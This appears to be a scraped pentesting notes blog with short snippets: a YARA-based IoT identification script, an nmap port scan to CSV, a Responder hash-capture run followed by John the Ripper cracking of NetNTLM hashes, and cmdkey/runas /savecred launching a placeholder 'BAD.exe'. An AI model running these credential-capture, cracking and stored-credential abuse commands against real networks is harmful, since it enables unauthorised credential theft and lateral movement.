apt-get update (gets the sources lists for packages)
apt-get upgrade (upgrade tools)
apt-get dist-upgrade (entire kali rolling)
apt-get autoremove (removes dependencies no longer needed)
Monday, November 25, 2019
Wednesday, November 6, 2019
Python IoT search with Wget and Yara Rules
# Given a list of urls, determine what type of IoT device (or any device for that matter) they are based on you plugging in Yara rules into the .yar files
import os
import subprocess
import traceback
debug = "false"
skipDownload = "false"
input = "urls.txt"
yaraSpecificRuleFile = "IoTSpecific.yar"
yaraGenericRuleFile = "IoTGeneric.yar"
wgetParams = "--quiet --no-check-certificate --timeout=2 --tries=3"
yaraParams = ""
outputExt = ".html"
urls = open(input, "r")
if skipDownload == "false":
for url in urls:
url = url.rstrip()
cleanurl = url.rstrip().replace('/','_').replace('\\','_').replace(':','_').replace('.','_').replace('&','_').replace('?','_').replace('=','_').replace('%','_') + outputExt
wgetCommand = ("wget %s --output-document=%s %s 2>/dev/null" % (wgetParams, cleanurl, url))
if(debug == "true"):
print(("DEBUG,Starting Download of '%s' to '%s'" % (url, cleanurl)))
try:
output = subprocess.check_output(wgetCommand, shell=True)
if "error" in output:
print(("ERROR,Unable to download '%s' error '%s'" % (wgetCommand, output)))
except Exception:
print(("ERROR,Unable to download '%s' error '%s'" % (wgetCommand,traceback.print_exc())))
if(debug == "true"):
print(("DEBUG,Finished Download of '%s' to '%s'" % (url, cleanurl)))
for htmlfile in os.listdir('.'):
if htmlfile.endswith(".html"):
if os.stat(htmlfile).st_size == 0:
print(("NoResponse,%s" % (htmlfile)))
else:
yaraCommand = ("yara %s %s %s" % (yaraParams, yaraSpecificRuleFile, htmlfile))
if(debug == "true"):
print(("DEBUG,Starting Scanning: '%s'" % (htmlfile)))
try:
output = subprocess.check_output(yaraCommand, shell=True)
if "error" in output:
print(("ERROR,Unable to Scan '%s' error '%s'" % (yaraCommand, output)))
if output:
output = output.rstrip()
print(output.replace(" ",","))
else:
yaraRescanCommand = ("yara %s %s %s" % (yaraParams, yaraGenericRuleFile, htmlfile))
if(debug == "true"):
print(("DEBUG,Starting ReScanning: '%s'" % (htmlfile)))
try:
output = subprocess.check_output(yaraRescanCommand, shell=True)
if "error" in output:
print(("ERROR,Unable to ReScan '%s' error '%s'" % (yaraCommand, output)))
if output:
output = output.rstrip()
print(output.replace(" ",","))
else:
print(("NoMatch,%s" % (htmlfile)))
except Exception:
print(("ERROR,Unable to ReScan '%s' error '%s'" % (yaraCommand,traceback.print_exc())))
if(debug == "true"):
print(("DEBUG,Finished ReScanning: '%s'" % (htmlfile)))
except Exception:
print(("ERROR,Unable to Scan '%s' error '%s'" % (yaraCommand,traceback.print_exc())))
if(debug == "true"):
print(("DEBUG,Finished Scanning: '%s'" % (htmlfile)))
urls.close()
import os
import subprocess
import traceback
debug = "false"
skipDownload = "false"
input = "urls.txt"
yaraSpecificRuleFile = "IoTSpecific.yar"
yaraGenericRuleFile = "IoTGeneric.yar"
wgetParams = "--quiet --no-check-certificate --timeout=2 --tries=3"
yaraParams = ""
outputExt = ".html"
urls = open(input, "r")
if skipDownload == "false":
for url in urls:
url = url.rstrip()
cleanurl = url.rstrip().replace('/','_').replace('\\','_').replace(':','_').replace('.','_').replace('&','_').replace('?','_').replace('=','_').replace('%','_') + outputExt
wgetCommand = ("wget %s --output-document=%s %s 2>/dev/null" % (wgetParams, cleanurl, url))
if(debug == "true"):
print(("DEBUG,Starting Download of '%s' to '%s'" % (url, cleanurl)))
try:
output = subprocess.check_output(wgetCommand, shell=True)
if "error" in output:
print(("ERROR,Unable to download '%s' error '%s'" % (wgetCommand, output)))
except Exception:
print(("ERROR,Unable to download '%s' error '%s'" % (wgetCommand,traceback.print_exc())))
if(debug == "true"):
print(("DEBUG,Finished Download of '%s' to '%s'" % (url, cleanurl)))
for htmlfile in os.listdir('.'):
if htmlfile.endswith(".html"):
if os.stat(htmlfile).st_size == 0:
print(("NoResponse,%s" % (htmlfile)))
else:
yaraCommand = ("yara %s %s %s" % (yaraParams, yaraSpecificRuleFile, htmlfile))
if(debug == "true"):
print(("DEBUG,Starting Scanning: '%s'" % (htmlfile)))
try:
output = subprocess.check_output(yaraCommand, shell=True)
if "error" in output:
print(("ERROR,Unable to Scan '%s' error '%s'" % (yaraCommand, output)))
if output:
output = output.rstrip()
print(output.replace(" ",","))
else:
yaraRescanCommand = ("yara %s %s %s" % (yaraParams, yaraGenericRuleFile, htmlfile))
if(debug == "true"):
print(("DEBUG,Starting ReScanning: '%s'" % (htmlfile)))
try:
output = subprocess.check_output(yaraRescanCommand, shell=True)
if "error" in output:
print(("ERROR,Unable to ReScan '%s' error '%s'" % (yaraCommand, output)))
if output:
output = output.rstrip()
print(output.replace(" ",","))
else:
print(("NoMatch,%s" % (htmlfile)))
except Exception:
print(("ERROR,Unable to ReScan '%s' error '%s'" % (yaraCommand,traceback.print_exc())))
if(debug == "true"):
print(("DEBUG,Finished ReScanning: '%s'" % (htmlfile)))
except Exception:
print(("ERROR,Unable to Scan '%s' error '%s'" % (yaraCommand,traceback.print_exc())))
if(debug == "true"):
print(("DEBUG,Finished Scanning: '%s'" % (htmlfile)))
urls.close()
Thursday, October 31, 2019
Nmap Open Web Ports to CSV
nmap scan web ports (80,443,8080,8443) and output to csv using sed
nmap -T4 --max-rtt-timeout 200ms --initial-rtt-timeout 150ms --min-hostgroup 512 -Pn -p 80,443,8080,8443 10.99.106.0/24 -oG - | egrep -v "^#|Status: Up" | sed -E 's/Host\:\s([^\s]+)\s[(]([^)]*)[)]\s+Ports[:]\s80\/([^/]+)\/.+443\/([^/]+)\/.+8080\/([^/]+)\/.+8443\/([^/]+)\/.*/\1,\2,\3,\4,\5,\6/' | grep open
nmap -T4 --max-rtt-timeout 200ms --initial-rtt-timeout 150ms --min-hostgroup 512 -Pn -p 80,443,8080,8443 10.99.106.0/24 -oG - | egrep -v "^#|Status: Up" | sed -E 's/Host\:\s([^\s]+)\s[(]([^)]*)[)]\s+Ports[:]\s80\/([^/]+)\/.+443\/([^/]+)\/.+8080\/([^/]+)\/.+8443\/([^/]+)\/.*/\1,\2,\3,\4,\5,\6/' | grep open
example:
10.99.106.10,test1.local.com,open,closed,closed,closed
10.99.106.11,,open,open,closed,closed
10.99.106.12,,open,open,closed,closed
10.99.106.76,test2.local.com,closed,open,closed,closed
Tuesday, October 22, 2019
Sample Responder command
responder -I eth0 -r -b
cd /usr/share/responder/logs
john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt
cd /usr/share/responder/logs
john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt
Friday, October 18, 2019
Print all Mac Address Vendors around you (Arp -a)
# print all mac address vendors around you (using arp table and this great python library https://pypi.org/project/mac-vendor-lookup/ )
import os
from mac_vendor_lookup import MacLookup
myCmd = os.popen("arp -a").read()
print(myCmd)
for line in myCmd.splitlines():
for item in line.split():
if "-" in item:
if "--" not in item:
try:
print(item + ": " + MacLookup().lookup(item))
except:
print(item + ": not found")
import os
from mac_vendor_lookup import MacLookup
myCmd = os.popen("arp -a").read()
print(myCmd)
for line in myCmd.splitlines():
for item in line.split():
if "-" in item:
if "--" not in item:
try:
print(item + ": " + MacLookup().lookup(item))
except:
print(item + ": not found")
View Stored Credentials and Runas
>cmdkey /list
Currently stored credentials:
....
runas /savecred /user:XXXX "c:\BAD.exe"
Currently stored credentials:
....
runas /savecred /user:XXXX "c:\BAD.exe"
Subscribe to:
Posts (Atom)